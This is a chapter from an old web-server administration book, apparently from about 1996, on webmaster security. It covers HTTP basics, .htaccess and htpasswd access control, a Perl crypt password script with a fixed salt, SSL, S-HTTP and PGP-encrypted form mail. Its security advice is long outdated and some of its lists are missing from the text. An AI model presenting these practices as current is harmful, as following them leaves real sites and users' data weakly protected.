Chapter 23

Key Web Access and Security Concerns for Webmasters

by Mike Morgan


CONTENTS

Ssecurity is a complex and controversial subject. Some people view system infiltrators as "freedom fighters of the information age," and some see cracking into systems as a test of technical skill, a cyber-rite of passage. Under most circumstances, however, penetrating a computer system without authorization is a crime. This chapter addresses the nature of the current threat and provides some guidelines for defense.

The first part of the chapter defines some terms and gives an overview of the major security threats. Next, the chapter describes what a local Webmaster can do to keep his or her site secure. Finally, this chapter takes up the topic of security administration, discussing the larger issues of site security, security policy, and security administration tools, to show what a site administrator can do to keep a site safe.

Web Security on the Internet and Intranet

The Internet and its cousin, corporate intranets, are built on a family of protocols known a+s the Transmission Control Protocol/Internet Protocol (TCP/IP). The heart of TCP/IP is its ability to connect any machine on the Internet to any other by routing packets from one machine to another. You can use the UNIX utility traceroute to see how your machine connects to other machines on the Internet. Suppose you work on a machine named mickey. If you enter

traceroute donald

you might get output like

traceroute to donald.com (--some IP address--), 30 hops max, 40 byte packets
1 minnie (--some IP address--) 20 ms  10 ms  10 ms
2 pluto  (--some IP address--) 120 ms  120 ms  120 ms
3 donald (--some IP address--) 150 ms  140 ms  150 ms

For that particular set of packets, your connection to donald passed through the machines minnie and pluto.

The traceroute output shows that when you pass information around the Net (whether the Internet or a corporate intranet), others attached to the Internet may be able to intercept and read, or even change, the information. How likely is it that you or your organization will be the target of an attack? That's part of what you must determine in establishing your security stance.

ISO Standard X.509 details nine threats that a computer network might face:

Most of these attacks can be mounted against either a site on the Internet or an intranet server. Many intranet sites have a firewall-a system to restrict access from machines not on the company's intranet. Just because your site is behind a firewall, don't assume "the natives are friendly." If your site is behind a firewall, great. Use the techniques described in this chapter to harden your site against attack. If someone does manage to penetrate your network security, they will have to deal with still more security, at the server level.

This chapter addresses defenses against masquerade and replay attacks, with less emphasis on denial of service and data interception.

Identity interception is a fact of life with most network services. A user can participate in an exchange anonymously using special anonymity servers on the Internet or by spoofing the e-mail system to appear as someone else. HTTP, the Web protocol, does not usually capture a user's name, therefore, making personal identity safer with the Web than with most other services.

Manipulation and repudiation are most easily prevented by using a digital signature system based on public keys. The public key system called Pretty Good Privacy (PGP) is described in this chapter. A different system, called Privacy Enhanced Mail (PEM) is described later in the chapter, in the context of Electronic Data Interchange (EDI). If you are using a commercial server such as Netscape's server products, you can also exchange secure mail and news.

TIP
Many attacks may be thwarted by encrypting data before it is sent and using digital signatures to prove that data was not altered after it was sent. In general, the public domain servers such as NCSA and Apache do not support these features (though, there is a secure version of Apache available).
Commercial servers, such as Netscape's FastTrack and Enterprise servers, do support a range of encryption and digital signature options. Encryption, digital signatures, and the infrastructure to support them are one of the most important reasons to consider a commercial server over a public domain (free) server.
Netscape's latest offering of servers includes a Certificate Server, and all of their servers (not just the Web servers) can be set up to look at the electronic signatures on a user's certificate before deciding whether or not to grant access.

There are no good defenses against misrouting and traffic analysis. If an attacker can gain access to the bitstream (either on the LAN or by grabbing it from the Internet), he or she can change mail headers (most of which are not encrypted) or perform traffic analysis. By using secure e-mail, however, the user can ensure that messages which are misrouted cannot be read by someone other than the intended recipient.

NOTE
This chapter uses the terms "hacker" and "cracker" in their technical sense. Just as the term "gentleman" once had a precise meaning (a male of noble birth), so the term "hacker" was coined to refer to the most productive people in a technical project-people who often worked extremely long hours to add clever technical features. For a detailed history of hackerism as the term is used here, see Steven Levy's excellent book Hackers: Heroes of the Computer Revolution (Dell: 1984). The term "cracker" refers to a person who commits unauthorized penetrations of computer systems. The analogous term "phone phreak" refers to people who make similar penetrations into the telephone system.

Simple Privacy

It's often said, "If you want something kept secret, don't tell anyone." Files served up on the World Wide Web are far from secret. In general, anyone who knows the URL can view the page. From time to time, however, a Webmaster needs a middle ground-files that should be widely available but not available to everyone. For example, assume that a site promotes membership in a club or organization. Promotional materials are available to the general public, but certain files are part of what a member buys when he or she joins, so those files should be available only to members.

Security is not without cost. Figure 23.1 illustrates the fact that one can achieve security only at the expense of ease-of-use and performance. A Webmaster can choose any operating point within this triangle, but cannot be at all three corners simultaneously.

Figure 23.1 : A Webmaster can operate a site anywhere within the triangle-but you can't be at all three corners at once!

With few exceptions, every step toward enhanced security is a step away from high performance and usability. Each system administrator, in concert with the Webmasters of the sites on the system, must determine where the acceptable operating points lie. One way to think about the trade-off between security and user issues is to compare the value of the information and service provided by the server to the likely threat. Security analysts often identify six levels of security threat:

  1. Casual users  These people might inadvertently compromise security.
  2. Curious users  These people are willing to explore the system but are unwilling to break the law.
  3. Greedy users  These people are willing to divulge information for financial gain but are unwilling to break the law.
  4. Criminals  These people are willing to break the law.
  5. Well-financed criminals  These people have access to sophisticated tools.
  6. Foreign governments  These people have essentially unlimited resources.

For most systems, the value of the information and service justifies securing the system against at least the first two or three levels of threat. No system openly available on the Internet can withstand a concerted attack from the highest levels of threat. In the late '80s, computer security experts agreed that most attacks came from curious or greedy users-often the technically gifted teenagers stereotyped by the movie War Games. These days, however, experts widely agree that the threat has grown more sophisticated. Attacks now are often committed by an uberhacker who is technically skilled, well-funded, and has strong motives for attacking a system. Indeed, the U.S. government has studied the topic of information warfare, a term that refers to the exploitation of computer infrastructure resources such as those operated by banks, telephone companies, and transportation companies, by a hostile government.

This chapter presents a series of security solutions, ranging from simple user authentication systems sufficient to keep out the casual user who might inadvertently compromise security, to fairly expensive systems that raise the cost of penetration high enough that potential infiltrators need good funding to succeed.

See the section on Security Administration Tools later in this chapter to learn some techniques that might deter, or at least detect, the uberhacker.

How Do Users Access Your Server?

Anyone who has entered an URL has wondered about the letters "http" and why they're omnipresent on the Web. HTTP, the Hypertext Transport Protocol, is a series of handshakes exchanged between a browser like Netscape and the server.

There are many different servers. CERN, a research center in Switzerland who did the original development of the Web, has one. So does the National Center for Supercomputer Applications, or NCSA, which did much of the early work on the graphical portions of the Web. Netscape Communications sells two Web servers, one (called FastTrack) targeted for general use and one (called Enterprise) targeted for the intranet market. The one thing all Web servers have in common is they speak HTTP.

The definitive description of HTTP is found at

http://www.ics.uci.edu/pub/ietf/http/

This directory contains detailed memos from the HTTP Working Group of the Internet Engineering Task Force. The latest version, HTTP 1.1, and its predecessor, HTTP 1.0, are the standards for how all communication is done over the Web.

Communication on the Internet takes place using a set of protocols named TCP/IP, which stands for Transmission Control Protocol/Internet Protocol. Think of TCP/IP as similar to the telephone system, and HTTP as a conversation between two people over the phone.

The Request  When a user enters an URL such as http://www.xyz.com/index.html, the TCP/IP on the user's machine talks to the network name servers to find out the IP address of the xyz.com server. TCP/IP then opens a conversation with the machine named www at that domain. TCP/IP defines a set of ports-each of which provides some service-on a server. By default, the HTTP server (commonly named httpd) is listening on port 80.

The client software (a browser like Netscape Navigator) starts the conversation. To get the file named index.html from www.xyz.com, the browser says the following:

GET /index.html http/1.0

This instruction is followed by a carriage return and a line feed, denoted by <CRLF>.

Formally, Index.html is an instance of a uniform resource identifier (URI). A uniform resource locator (URL) is a type of URI.

NOTE
There are provisions in the Web specifications for identifiers to specify a particular document, regardless of where that document is located. There are also provisions that allow a browser to recognize that two documents are different versions of the same original-differing in language, perhaps, or in format (for example, one might be plain text, and another might be in PDF). For now, most servers and browsers know about only one type of URI, the URL.

The GET method asks the server to return whatever information is indicated by the URI. If the URI represents a file (like Index.html), then the contents of the file are returned. If the URI represents a process (like Formmail.cgi), then the server runs the process and sends the output.

Most commonly, the URI is expressed in terms relative to the document root of the server. For example, the server might be configured to serve pages starting at

/usr/local/etc/httpd/htdocs

If the user wants a file, for instance, whose full path is

/usr/local/etc/httpd/htdocs/hypertext/WWW/TheProject.html

the client sends the following instruction:

GET /hypertext/WWW/TheProject.html http/1.0

The http/1.0 at the end of the line indicates to the server what version of HTTP the client is able to accept. As the HTTP standard evolves, this field will be used to provide backwards compatibility to older browsers.

The Response  When the server gets a request, it generates a response. The response a client wants usually looks something like the following:

HTTP/1.0 200 OK
Date: Mon, 19 Feb 1996 17:24:19 GMT
Server: Apache/1.0.2
Content-type: text/html
Content-length: 5244
Last-modified: Tue, 06 Feb 1996 19:23:01 GMT
<!DOCTYPE HTML PUBLIC "-//IETF/DTD HTML 3.0//EN">
<HTML>
<HEAD>
.
.
.
</BODY>
</HTML>

The first line is called the status line. It contains three elements, separated by spaces:

When the server is able to find and return an entity associated with the requested URI, it returns status code 200, which has the reason phrase OK.

The first digit of the status code defines the class of response. Table 23.1 lists the five classes.

Table 23.1  HTTP Servers Respond to a Request with a Response Status Code that Belongs to One of These Five Classes

Code
Class Meaning
1xx
Informational These codes are not used but are reserved for future use.
2xx
Success The request was successfully received, understood, and accepted.
3xx
Redirection Further action must be taken to complete the request.
4xx
Client error The request contained bad syntax or could not be fulfilled through no fault of the server.
5xx
Server error The server failed to fulfill an apparently valid request.

Table 23.2 shows the individual values of all status codes presently in use, and a typical reason phrase for each code. These phrases are given as examples in the standard-each site or server can replace these phrases with local equivalents.

Table 23.2  Status Codes and Reason Phrases

Status Code
Reason Phrase
200
OK
201
Created
202
Accepted
203
Partial Information
204
No Content
301
Moved Permanently
302
Moved Temporarily
303
Method
304
Not Modified
400
Bad Request
401
Unauthorized
402
Payment Required
403
Forbidden
404
Not Found
500
Internal Server Error
501
Not Implemented
502
Server Temporarily Overloaded (Bad Gateway)
503
Server Unavailable (Gateway Timeout)

The most common responses are 200, 204, 302, 401, 404, and 500. These and other status codes are discussed more fully in the document located at

http://www.w3.org/pub/WWW/Protocols/HTTP/HTRESP.html

We have already described code 200. It means the request has succeeded and data is coming.

Code 204 means the document has been found but is completely empty. This code is returned if the developer has associated an empty file with an URL, perhaps as a placeholder. The most common browser response when code 204 is returned is to leave the current data on-screen and put up an alert dialog box that says Document contains no data or something to that effect.

When a document has been moved, a code 3xx is returned. Code 302 is most commonly used when the URI is a Common Gateway Interface (CGI) script that outputs something like the following:

_Location: http://www.xyz.com/newPage.html

Typically, this line is followed by two line feeds. Most browsers recognize code 302, and look in the Location: line to see which URL to retrieve; they then issue a GET to the new location. Chapter 31, "The Common Gateway Interface," contains details about outputting Location: from a CGI script.

Status code 401 is seen when the user accesses a protected directory. The response includes a WWW-Authenticate header field with a challenge. Typically, a browser interprets a code 401 by giving the user an opportunity to enter a username and password. The section "Built-In Server Access Control," later in this chapter, contains details on protecting a Web site.

Status-code 402 has some tantalizing possibilities. So far it has not been implemented in any common browsers or servers. Chapter 34, "Transactions and Order Taking," describes some methods that are in common use, allowing the site owner to collect money.

When working on new CGI scripts, the developer frequently sees code 500. The most common explanation of code 500 is that the script has a syntax error, or is producing a malformed header. Chapter 31, "The Common Gateway Interface," describes how to write CGI scripts to avoid error 500.

Other Requests  The preceding examples involved GET, the most common request. A client can also send requests involving HEAD, POST, and conditional GET.

The HEAD request is just like the GET request, except no data is returned. HEAD can be used by special programs called proxy servers to test URIs to see if an updated version is available or just to ensure that the URI is available.

POST is like GET in reverse. POST is used to send data to the server. Developers use POST most frequently when writing CGI scripts to handle form output.

Typically, a POST request brings a code 200 or code 204 response.

Requests Through Proxy Servers  Some online services, such as America Online, and some intranets set up machines to be proxy servers. A proxy server sits between the client and the real server. When the client sends a GET request, for example, to www.xyz.com, the proxy server checks to see if it has the requested data stored locally. This local storage is called a cache.

If the requested data is available in the cache, the proxy server determines whether to return the cached data or the version that's on the real server. This decision usually is made on the basis of time-if the proxy server has a recent copy of the data, it can be more efficient to return the cached copy.

To find out whether the data on the real server has been updated, the proxy server can send a conditional GET, like the following:

GET index.html http/1.0
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT <CRLF>

If the request would not normally succeed, the response is the same as if the request were a GET. The request is processed as a GET if the date is invalid (including a date that's in the future). The request also is processed as a GET if the data has been modified since the specified date. If the data has not been modified since the requested date, the server returns status code 304 (Not Modified).

If the proxy server sends a conditional GET, either it gets back data or it doesn't. If it gets data, it updates the cache copy. If it gets code 304, it sends the cached copy to the user. If it gets any other code, it passes that code back to the client.

Header Fields  If-Modified-Since is an example of a header field. There are four types of header fields:

General headers may be used on a request or on the data. Data can flow both ways. On a GET request, data comes from the server to the client. On a POST request, data goes to the server from the client. In either case, the data is known as the entity.

The three general headers defined in the standard are

By convention, the server should send its current date with the response. By the standard, only one Date header is allowed.

Although HTTP does not conform to the MIME standard, it is useful to report content types using MIME notation. To avoid confusion, the server may send the MIME version that it uses. MIME version 1.0 is the default.

Optional behavior can be described in Pragma directives. HTTP/1.0 defines the nocache directive on request messages, to tell proxy servers to ignore their cached copy and GET the entity from the server.

Request header fields are sent by the browser software. The valid request header fields are

Referer can be used by CGI scripts to determine the preceding link. For example, if Susan announces Bob's site to a major real estate listing, she can keep track of the Referer variable to see how often users follow that link to get to Bob's site.

User-Agent is sent by the browser to report what software and version the user is running. This field ultimately appears in the HTTP_USER_AGENT CGI variable and can be used to return pages with browser-specific code.

Response header fields appear in server responses and can be used by the browser software. The valid response header fields are

Location is the same "Location" mentioned earlier in this chapter, in the "The Response" section. Most browsers expect to see a Location field in a response with a 3xx code, and interpret it by requesting the entity at the new location.

Server gives the name and version number of the server software.

WWW-Authenticate is included in responses with status code 401. The syntax is

_WWW-Authenticate: 1#challenge_

The browser reads the challenge(s)-there must be at least one-and asks the user to respond. Most popular browsers handle this process with a dialog box prompting the user for a username and password. The "Built-In Server Access Control" section later in this chapter describes the authentication process in more detail.

Entity header fields contain information about the data. Recall that the data is called the entity; information about the contents of the entity body, or meta-information, is sent in entity header fields. Much of this information can be supplied in an HTML document using the <META> tag.

The entity header fields are

In addition, new field types can be added to an entity without extending the protocol. It's up to the author to determine what software (if any) will recognize the new type. Client software ignores entity headers that it doesn't recognize.

The Expires header is used as another mechanism to keep caches up-to-date. For example, an HTML document might contain the following line:

_<META http-equiv="Expires" Contents="Thu, 01 Dec 1994 16:00:00 GMT">

This means that a proxy server should discard the document at the indicated time and should not send out data after that time.

NOTE
The exact format of the date is specified by the standard, and the date must always be in Greenwich Mean Time (GMT).

Built-In Server Access Control

The easiest way to protect files is to use the access control mechanisms built into NCSA, Apache, and similar UNIX servers. These techniques are not powerful, and they can be foiled with very little effort. Nevertheless, they're easy to implement, and they keep confidential files away from most casual browsers.

TIP
The Netscape Web servers (FastTrack and Enterprise) as well as the new Netscape Orion technology provide security capabilities well in excess of that available in NCSA and its kin. If your site needs pin-point control over access, check out the Netscape products. Also, if you need to run on a Windows NT platform instead of UNIX, you will want to look at the Netscape and Microsoft products.
For more information on the Netscape servers, see Running a Perfect Netscape Site (Que, 1996). Microsoft's entry, Microsoft Internet Information Explorer, is described in Running a Perfect Web Site with Windows (Que, 1996).

access.conf  The NCSA server looks for a file named access.conf in the configuration directory. The following are two typical entries for access.conf:

<Directory /usr/local/etc/httpd/htdocs/morganm>
_<Limit GET>
_order allow, deny
_allow from all
_</Limit>
</Directory>
<Directory /usr/local/etc/httpd/htdocs/ckepilino>
_<Limit GET>
_order deny, allow
_deny from all
_allow from dse.com
_</Limit>
</Directory>

These entries tell the server who has access to the morganm and ckepilino directories, respectively. The first line of each entry names the directory. The next line shows that GET requests are restricted. The order directive specifies the order in which allow and deny directives should be applied. In the first example, GET requests are allowed to the morganm directory from any domain and denied from none. In the second example, the deny directive is applied first, so access is not allowed from anywhere. Then the allow directive is invoked, allowing access to the ckepilino directory only from dse.com, as an exception to the general denial rule.

.htaccess  You can place the same entries shown earlier in access.conf in a file named .htaccess in the directory you want protected. This approach decentralizes access control. Instead of requiring the site Webmaster to manage access.conf, this approach allows each directory owner to set up localized security. To restrict access to the ckepilino directory, for example, make a file named .htaccess (notice the period before the name-this makes the file invisible to casual browsers). Put the following lines in the file:

<Limit GET>
_order deny, allow
_deny from all
_allow from dse.com
</Limit>

The same mechanism can be used to limit POST as well as GET.

User Authentication  The next step in site protection is user authentication. For example, to restrict access to the morganm directory to the specific users jean, chris, and mike, put the following lines in the access.conf file:

<Directory /usr/local/etc/httpd/htdocs/morganm>]
_Options Indexes FollowSymlinks
_AllowOverride None
_AuthUserFile /usr/local/etc/httpd/conf/.htpasswd
_AuthGroupFile /dev/null
_AuthName By Secret Password Only!
_AuthType Basic
_<Limit GET>
__require user jean
__require user chris
__require user mike
_</Limit>
</Directory>

To do the same thing using an .htaccess file, use the following lines:

AuthUserFile /home/morganm/.htpasswd
AuthGroupFile /dev/null
AuthName By Secret Password Only!
AuthType Basic
<Limit GET>
_require user jean
_require user chris
_require user mike
</Limit>

In both cases, AuthUserFile specifies the absolute pathname to the password file. The location of this file is unimportant, as long as it's outside the Web site's document tree. The AuthGroupFile directive is set to /dev/null-a way of saying that this directory does not use group authentication. The AuthName and AuthType directives are required and are set to the only options currently available in the NCSA server.

htpasswd  To create the password file that's specified by AuthUserFile, run the program htpasswd. This program does not always come with the server installation kit but is available from the same source. It must be compiled locally.

To run htpasswd the first time, type something like the following:

htpasswd -c /home/morganm/.htpasswd jean

The -c option creates a new password file with the specified pathname. The username (in this case, jean) specifies the first user to be put into the file. htpasswd responds by prompting for the password.

Your subsequent calls to htpasswd should omit the -c option:

htpasswd /home/morganm/.htpasswd chris
htpasswd /home/morganm/.htpasswd mike

Once the password file is in place, it's easy to tell the server to read (or reread) the file. On UNIX, run the following command:

ps -ef | grep httpd

NOTE
On some versions of UNIX, ps -aux is the first command.

This command lists all the current copies of the Web server, something like the following:

root 9514_1_0 16:55:45 - 0:00 /usr/local/etc/apache/src/httpd
nobody 9772_9514_0 16:55:45 - 0:00 /usr/local/etc/apache/src/httpd
nobody 11568_9514_0 16:55:45 - 0:00 /usr/local/etc/apache/src/httpd
nobody 11822_9514_0 16:55:45 - 0:00 /usr/local/etc/apache/src/httpd
nobody 12084_9514_0 16:55:45 - 0:00 /usr/local/etc/apache/src/httpd
nobody 12338_9514_0 16:55:45 - 0:00 /usr/local/etc/apache/src/httpd

Look for the one that begins with root. Its process ID is used as the parent process ID of all the other copies. Note the process ID of that parent copy. For this example, it's 9514. Once you've obtained this number, enter the following line:

kill -HUP 9514

This command sends a hang-up signal (SIGHUP) to the server daemon. For most processes, the hang-up signal tells the server that an interactive user, dialed in by modem, has hung up. Daemons, of course, have no interactive users (at least not the sort who can get to them by modem), but by convention, sending SIGHUP to a daemon tells it to reread its configuration files. When the parent copy of httpd rereads access.conf, it learns about the new restrictions and starts enforcing them.

You can use similar techniques to set up authenticating groups, but requirements for group authentication are less common. See your server documentation if you want details.

Password-Protection Scripts

The built-in access control mechanisms are easy to set up and offer security against casual threats; however, they will not resist a determined attack. Anyone with certain types of network monitoring equipment can read the username and password out of the packets. If there's an ethernet LAN close to the server, for example, an ethernet card can be put into "promiscuous mode" and told to read all traffic off the network. For even lower cost, a determined cracker can often guess enough passwords to penetrate most sites. Some servers honor a GET request for .htaccess, giving the cracker knowledge of where the password file is kept. Even though the passwords are encrypted, methods exist to guess many passwords. Software is available to try every word in the dictionary in just a few minutes. A brute force search involving every word of six or fewer characters takes under an hour. Compromise of a site does not require compromise of every account-just one. Studies have found that, before users are taught how to choose and change passwords, as many as 50% of the passwords on a site fall victim to a simple cracking program. After training, about 25% of the passwords are still vulnerable.

Rules for choosing good passwords can be built into software. A password should be long (eight characters or more) and should not be any word appearing in a dictionary or related at all to the user's personal information. A password should not be the same as the username or the same as any of the computer vendor's default passwords. The password should be entered in mixed case-or, better yet, with punctuation or numbers mixed in. Every user should change passwords regularly, and when a new password is chosen, it should not be too similar to the old password.

passwd+ is designed to replace the UNIX system's standard password maintenance program (/bin/passwd). It catches and rejects passwords following certain patterns-it rejects many for being too short or matching a dictionary word. Many newer versions of UNIX have incorporated logic similar to passwd+ into their own version of passwd; for Web site password protection, logic similar to passwd+ certainly could be incorporated.

It's important to make sure that passwords are written to the disk in encrypted form, and that the file holding the passwords is read-protected. The following three listings provide the basis for a simple password protection system. Like .htaccess, this system is vulnerable to network sniffing and replay. Unlike .htaccess, however, this system can be extended to include passwd+-style logic so that the passwords hold up better against crackers.

NOTE
If you're not familiar with CGI scripting, you might want to skip this section until you've read Chapter 31. If you're new to Perl, be sure to read Teach Yourself Perl 5 in 21 Days, Second Edition (Sams, 1996).

The CD-ROMs that accompany this book contain login.cgi. Connect an HTML form to login.cgi and use it to collect user names and passwords. If they present a valid name and password, the script redirects them to a file in the protected subdirectory. If they are the site owner (as evidenced by their $LEVEL being equal to two), they are redirected to the addUser.html page.

User passwords are maintained with the script named addUser.cgi, also available on the CD-ROMs. When login.cgi recognizes the site owner and sends them to addUser.html, they supply the data for the new user.

To get started, write a one-line Perl program to encrypt a password. For example, if you want your password to be OverTheRiver, run the script in Listing 23.1.


Listing 23.1  Starter.pl-Use This Little Script to Generate the First Password
#!/usr/local/bin/perl
# By Michael Morgan, 1995
$encryptedPassword = crypt("OverTheRiver", 'ZZ');
print $encryptedPassword;
exit;

You get a reply like the following (the actual characters may vary):

ZZe/eiKRvN/k.

Copy the encrypted password into the owner's line in the password file. After that, delete the program from the disk.

Each line of the password file should look similar. If the owner of the files is named Jones, for example, the owner's line might read as follows:

jones:ZZe/eiKRvN/k.:1:2:
I. M. Jones, (804) 555-1212, (804) 555-2345, jones@xyz.com

Once the first line of the file has been built by hand, the owner can add subsequent users by using the script.

If a cracker can get a copy of the password file, then he can run CRACK or more sophisticated password crackers against it. Make sure that the password file is outside the document tree, forcing the cracker to test password guesses online. Next, add a counter to the preceding script so that repeated attempts to access a user ID will disable that account and notify the system administrator.

Realize that these mechanisms do nothing to keep local users out of the site. On any system with more than a few users, a computer-assisted cracker can probably guess at least one password. Make sure that key files like source code and password files are readable only by those who absolutely must have access.

Vulnerability Due to CGI Scripts and Server-Side Includes

CGI scripts and server-side includes (SSIs) can make the server vulnerable. Many Webmasters believe that because the server runs as the unprivileged user nobody, no harm can be done. But nobody can copy the /etc/passwd file, mail a copy of the file system map, dump files from /etc, and even start a login server (on a high port) for an attacker to telnet to. User nobody can also run massive programs, bringing the server to its knees in a denial-of-service attack.

If you allow SSIs or CGI scripts on your site, be sure to read Chapters 33, "Server-Side Includes," and 35, "CGI Security."

Communications Security

Web site security works like a home burglar alarm. You don't expect to make your site impregnable, but making it difficult to crack encourages crackers to move on to less fortified sites. Once the private parts of the site are password-protected, and the common CGI holes are closed, the remaining vulnerability at the Web-site level resides in the communications links between the user and the site. An aggressive cracker can sniff passwords, credit card numbers, and other confidential information directly from the Internet.

Credit card companies have led the effort to encrypt communications links. Credit card theft on the Internet is expected to follow a different pattern than theft in conventional transactions. When a physical card is stolen, thieves know that they have just a few days-maybe just hours-before the card number is deactivated. They try to run up as large a balance as possible while the card is still good. In so doing, they often trigger security software. If, on the other hand, a thief could get access to thousands of credit card numbers, then he could use each number just once. Such illegal use is unlikely to trip any credit card company alarms, and therefore could lead to massive loss in the industry.

TIP
To learn about your options for accepting credit card or other secure information over the Web, be sure to read Chapter 34, "Transactions and Order Taking."

To put matters in perspective, many sites accept credit card numbers in the clear, but even in late 1996, it is difficult to document a single case of loss. Of course, if Internet credit card theft is following the low-density pattern described earlier, one does not expect loss to be detected or reported. In any case, as the size of the Web continues to grow-and the number of commercial transactions increases-it seems wise to provide protection for confidential information like credit card numbers.

TIP
Some security experts advise their clients this way: "If you give your credit card number over the phone, or if you don't ask for the carbons when you sign the charge slip, then don't worry about giving your card number in the clear over the Internet."

Secure Socket Layer

Most Webmasters are aware that Netscape Communications Corporation offers secure Web servers, the FastTrack server and the Enterprise server. The security in these products is based on Netscape's low-level encryption scheme, Secure Sockets Layer (SSL). Recall from the section in this chapter entitled "How Do Users Access Your Server?" that the Web is based on TCP/IP. TCP/IP consists of several software "layers"-you can replace the software implementing a layer with a new software component, without changing the rest of the protocols. SSL is a network-layer encryption scheme. When a client makes a request for secure communications to a secure server, the server opens an encrypted port. The port is managed by software called the SSL Record Layer, which sits on top of TCP. Higher-level software, the SSL Handshake Protocol, uses the SSL Record Layer and its port to contact the client.

The SSL Handshake Protocol on the server arranges authentication and encryption details with the client using public-key encryption. Public-key encryption schemes are based on mathematical "one-way" functions. In a few seconds, anyone can determine that 7´19 equals 133. On the other hand, determining that 133 can be factored by 7 and 19 takes quite a bit more work. A user who already has these factors (the "secret key") can decrypt the message easily. Some commercial public-key encryption schemes are based on keys of 1,024 bits or more, which should require years of computation to crack. Using public-key encryption, the client and server exchange information about which cypher methods each understands. They agree on a one-time key to be used for the current transmission. The server might also send a certificate (called an X.509.v3 certificate) to prove its own identity.

NOTE
Mathematically strong encryption schemes are classified by the U.S. Government as "munitions." In general, encryption software and algorithms developed in the U.S. cannot be exported. The U.S. Government takes this issue very seriously. Some other nations have policies prohibiting the transmission of encrypted data through their telephone lines. These policies have been the topic of much debate on the Internet and elsewhere.
In many cases, software that is compatible with the strong encryption schemes available in the U.S. has been developed outside the United States and is available as an "International" version. Be sure to read the license agreement that comes with your software. Users in the U.S. should use the U.S. version and are restricted from taking (or sending) the product overseas. Users outside the U.S. may be able to use the international version, subject to the laws in their country.
In other cases, vendors have weakened the algorithm by reducing the key size from 1,024 bits to 128 or even 40 bits, to avoid certain government restrictions.
In all cases, check the documentation that came with your browser or server, or get legal advice, to see what you can and cannot do with your software.

In the Netscape browser, a "key" icon in the lower-left corner of the window shows whether a session is encrypted or not. A broken key indicates a non-secure session. A key with one tooth shows that the session is running on a 40-bit key. A key with two teeth shows that a 128-bit key is in use.

End users should not assume that seeing an unbroken key guarantees that their transmission is secure. They also should check the certificate. In Netscape Navigator, you can access this information by choosing View, Document Info. If the certificate is not owned by the organization the users think they're doing business with, they should verify the certificate by calling the vendor.

SSL was developed by Netscape Communications and is supported by their browsers and servers. Open Market has announced that they will support SSL in their HTTP server. A free implementation of SSL, named SSLeay, serves as the basis for security in Apache and NCSA httpd, as well as in Secure Mosaic.

ON THE WEB
http://home.netscape.com/newsref/std/SSL.html  This site deals with SSL 3.0 standards and licensing.
http://home.netscape.com/eng/ssl3/   This site is the top of a hierarchy containing the technical specifications of SSL 3.0.
http://home.mcom.com/newsref/ref/internet-security.html  This site contains more general information on SSL.
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/  This site is the site to visit to download the SSL library SSLeay.
http://www.psy.uq.oz.au/~ftp/Crypto/  This site contains the Frequently Asked Questions list for SSLeay.

SSL is a powerful encryption method. Because it has a publicly available reference implementation, you can easily add it to existing software such as Web and FTP servers. It's not perfect-for example, it doesn't flow through proxy servers correctly-but it's a first step in providing communications security.

Secure HTTP

A competing standard to SSL is Secure HTTP (S-HTTP) from Enterprise Integration Technologies. Like SSL, S-HTTP allows for both encryption and digital authentication. Unlike SSL, though, S-HTTP is an application-level protocol-it makes extensions to HTTP.

The S-HTTP proposal suggests a new document suffix, .shttp and the following new protocol:

Secure * Secure-HTTP/1.1.

Using GET, a client requests a secure document, tells the server what kind of encryption it can handle, and tells the server where to find its public key. If the user who matches that key is authorized to GET the document, the server responds by encrypting the document and sending it back-the client then uses its secret key to decrypt the message and display it to the user.

One of the encryption methods available with S-HTTP is PGP, described in the next section.

Pretty Good Privacy

The Pretty Good Privacy application, written by Phil Zimmerman, has achieved fame and notoriety by spreading "encryption for everyone." For several years, PGP hung under a cloud since it did not have clear license to use the public-key encryption algorithms. There was also an investigation into whether Zimmerman had distributed PGP outside the United States. (U.S. law prohibits the distribution of strong encryption systems.)

Those clouds have finally lifted. With the release of PGP 2.6, the licensing issues have been entirely resolved, and the U.S. Government has announced that it has no interest in seeking indictments against Zimmerman.

If you live in the U.S. and are a U.S. citizen or lawfully admitted alien, you can get PGP from the server at MIT. If you live outside the U.S., you should use PGP 2.6ui-this version was built in Europe and does not violate U.S. export control laws.

ON THE WEB
http://web.mit.edu/network/pgp-form.html  You can get PGP by visiting this URL and following the instructions given.
ftp://ftp.informatik.uni-hamburg.de/virus/crypt/pgp/tools  You can get the latest European-built version of PGP from this FTP site.
http://www.viacrypt.com/  Check out this site for more information on the commercial version of PGP.

Part of the agreement with the patent-holder, RSA Data Security, Inc., was that PGP could not be used for commercial purposes. A commercial version of the program, with proper licensing, is available from ViaCrypt.

Although PGP is available on all common platforms, its user interface is essentially derived from the UNIX command line; in other words, it's not particularly user-friendly. The ViaCrypt version has addressed this concern to some extent, but it's still fair to say that only a very small percentage of users use PGP on a regular basis. If S-HTTP moves into the mainstream, more users might use PGP "behind the scenes" as the basis for session encryption.

One good use of PGP, apart from S-HTTP, is in dealing with information after a user has sent it to the server. Suppose that a hotel accepts reservations (with a credit card number for collateral) over the Web. The hotel might use the Netscape Enterprise Server to ensure that credit card data is not sent in the clear between the user and the Web site. Then, once the CGI script gets the credit card information, what can it do with it? If it stores it unencrypted on a hard disk, the numbers are vulnerable to a cracker who penetrates overall site security. If the card numbers are sent in the clear via e-mail to a reservation desk, they risk being sniffed en route over the Internet.

One solution is to use PGP to transfer the reservation message (including credit card data) by secure e-mail. Start with a form mailer like Matt Wright's formmail.pl (available at Matt's Script Archive, http://www.worldwidemart.com/scripts/). Find the place in that script where it opens a file handle to sendmail, and change it to the following:

open (MAIL, "| /usr/local/bin/pgp -eatf reservations |
mail reservations@localInn.com") || &die("Could not open mail");

No user-supplied data has been passed to the shell. Now, put the reservations desk on the PGP public keyring. When the script runs, PGP encrypts (the -e option) the text (-t) from STDIN for user reservations into ASCII characters and adding armor lines (-a) to prevent tampering. The result is written to STDout because the filter option (-f) is turned on.

The reservation clerk must have his own copy of PGP (it's available for PCs, Macs, and other common platforms). When the reservation clerk receives the encrypted message, he decrypts it using his secret key, making sure to store the credit card data and other private information offline. He can also save the encrypted message on his local disk, using PGP and a secret passphrase.

TIP
PGP allows the user to input a passphrase instead of a password. Passphrases can be arbitrarily long, and may have embedded white space and other special characters. Take advantage of this flexibility to make the passphrase difficult to guess.

Site Security

The first section of this chapter, "Web Security on the Internet and Intranet," tells you what individual Webmasters can do to enhance the security of their Web site. Closing the door to HTTP infiltrators is of little use, if infiltrators can penetrate the site through FTP, sendmail, or telnet. This chapter covers the steps the system administrator can take to make the site more resistant to attack.

